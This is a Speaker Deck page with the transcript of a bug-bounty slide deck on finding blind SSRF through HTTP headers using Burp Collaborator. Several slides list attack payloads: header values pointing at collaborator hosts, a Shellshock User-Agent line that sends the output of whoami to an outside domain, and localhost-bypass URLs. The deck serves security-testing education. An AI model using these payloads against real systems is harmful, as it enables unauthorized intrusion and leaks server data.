Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Hunting Headers for SSRF

Aditya Shende
February 27, 2021
Technology
5
5.9k

Hunting Headers for SSRF

People who know/love SSRF they will get to know.... <3

Aditya Shende

February 27, 2021
Tweet

More Decks by Aditya Shende

See All by Aditya Shende
Dependency Confusion
aditya45
2
1.9k
What_to_hunt_as_beginner....pdf
aditya45
5
3.7k
Account Takeover Methodologies
aditya45
5
1.8k
Abusing functions for bug bounty
aditya45
6
5.1k
Github Recon and way to process
aditya45
5
3.6k
2FA bypassing for bug bounties
aditya45
6
2.7k
Approach to learn and time management for bug bounties
aditya45
3
2.6k
Bug Bounty Tips by Aditya Shende aka Kong
aditya45
5
5k

Other Decks in Technology

See All in Technology
10分でわかるfreeeのQA
freee
1
3.4k
わたしとトラックポイント / TrackPoint tips
masahirokawahara
1
240
AWSコンテナ本出版から3年経った今、もし改めて執筆し直すなら / If I revise our container book
iselegant
15
4k
omakaseしないための.rubocop.yml のつくりかた / How to Build Your .rubocop.yml to Avoid Omakase #kaigionrails
linkers_tech
3
730
プロダクトチームへのSystem Risk Records導入・運用事例の紹介/Introduction and Case Studies on Implementing and Operating System Risk Records for Product Teams
taddy_919
1
170
来年もre:Invent2024 に行きたいあなたへ - “集中”と“つながり”で楽しむ -
ny7760
0
470
2024-10-30-reInventStandby_StudyGroup_Intro
shinichirokawano
1
630
CAMERA-Suite: 広告文生成のための評価スイート / ai-camera-suite
cyberagentdevelopers
PRO
3
270
AIを駆使したゲーム開発戦略: 新設AI組織の取り組み / sge-ai-strategy
cyberagentdevelopers
PRO
1
130
Java x Spring Boot Warm up
kazu_kichi_67
2
490
ExaDB-D dbaascli で出来ること
oracle4engineer
PRO
0
3.6k
Amazon_CloudWatch_ログ異常検出_導入ガイド
tsujiba
4
1.6k

Featured

See All Featured
Building an army of robots
kneath
302
42k
Build your cross-platform service in a week with App Engine
jlugia
229
18k
VelocityConf: Rendering Performance Case Studies
addyosmani
325
24k
XXLCSS - How to scale CSS and keep your sanity
sugarenia
246
1.3M
Unsuck your backbone
ammeep
668
57k
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
41
2.1k
Bootstrapping a Software Product
garrettdimon
PRO
305
110k
What’s in a name? Adding method to the madness
productmarketing
PRO
22
3.1k
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
smashingmag
250
21k
It's Worth the Effort
3n
183
27k
Designing on Purpose - Digital PM Summit 2013
jponch
115
6.9k
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
191
16k

Transcript

  1. KONG WHOAMI ? ADITYA SHENDE BOUNTY HUNTER & TRAINER INDIAN

  2. Hackers gonna hack... ADITYA SHENDE : BOUNTY HUNTER HUNTING HEADERS

    FOR SSRF HUNTING HEADERS FOR SSRF HUNTING HEADERS FOR SSRF HUNTING HEADERS FOR SSRF

  3. SSRF SSRF SSRF SSRF A BASIC Server-side request forgery (also

    known as SSRF) is a web security vulnerability that allows an attacker to cause HTTP requests from the server-side application to an arbitrary domain of the attacker's choice.

  4. What Blind ? When an application can be induced to

    send a back-end HTTP request to a supplied URL, blind SSRF vulnerabilities occur, but the response from the back-end request is not returned in the front-end response of the application. BLIND SSRF OVER HEADERS

  5. What technique >>> OAST: OUT-OF-BAND APPLICATION SECURITY TESTING BURPSUITE >>

    TARGET >> HTTP,SMTP,DNS. IF A VULNERABILITY IS BLIND, THEN IT SENDS BACK NO USEFUL RESPONSE TO US WHEN WE SEND A TEST ATTACK - EVEN IF THAT ATTACK IS SUCCESSFUL

  6. BURP COLLABORATOR BURP COLLABORATOR IS A NETWORK SERVICE USED BY

    BURP SUITE TO HELP IDENTIFY MANY VARIETIES OF VULNERABILITIES. Everywhere !!! When using Burp Collaborator, Burp sends payloads to the audited application that are intended to trigger Collaborator server encounters when certain bugs or behaviors occur.

  7. USE & WORKFLOW By inserting non-invasive headers designed to unveil

    backend systems by forcing pingbacks to Burp Collaborator, this extension improves your in-scope proxy traffic. Simply install it and browse the goal website to use it. Collaborator Everywhere

  8. Automatic bruhh... Headers Referer: True-Client-IP: X-Wap-Profile: X-Client-IP: CF-Connecting_IP: X-Forwarded-For: Client-IP:

    X-Originating-IP: All headers with burp-collaborator link

  9. https://burplink.net:22/test.php 22 : NOTHING https://burplink.net:80/test.php 80 : HTTP & DNS

    https://burplink.net:443/test.php 443 : DNS https://burplink.net:3306/test.php 3306 : NOTHIG

  10. HOT TOPIC: ARTISTS' ROYALTIES WHAT REQUEST ?

  11. HEADERS FOR HACKERS Evil payloads over headers: X-Forwarded-For: id.burplink.net:8080/aditya.php X-Forwarded-For:

    http://user:pass@hostname/ User-Agent:() { :; }; /usr/bin/nslookup $(whoami).id.burpcollaborator.net

  12. HTTP or DNS

  13. Item 1 Item 2 Item 3 Item 4 Item 5

    40 30 20 10 0 Response status code: Online internal asset:port responds with 200 OK vs offline internal asset:port 500 Internal Server Error Response contents: The response size in bytes is smaller or bigger depending on whether or not the URL you are trying to request is reachable. Response timing: The response times are slower or faster depending on whether or not the URL you are trying to request is reachable.

  14. ALPHANUMERIC http:// ⓔⓧⓐⓜⓟⓛⓔ. ⓒⓞⓜ = example.com SHORT-HAND IP http://0/Admin/ http://127.1/AdMiN

    http://127.0.1/aDMIn LOCALHOST WITH A DOMAIN REDIRECTION http://spoofed.burpcollaborator.net http://localtest.me 127.0.0.1.nip.io STORY OF [::] http://[::]:22/ SSH

  15. Add collaborator link everywhere , You may get HTTP NOT

    EVERY HTTP IS SSRF ADITYA SHENDE

  16. Thanks... Find me on Google Keyword: Kongsec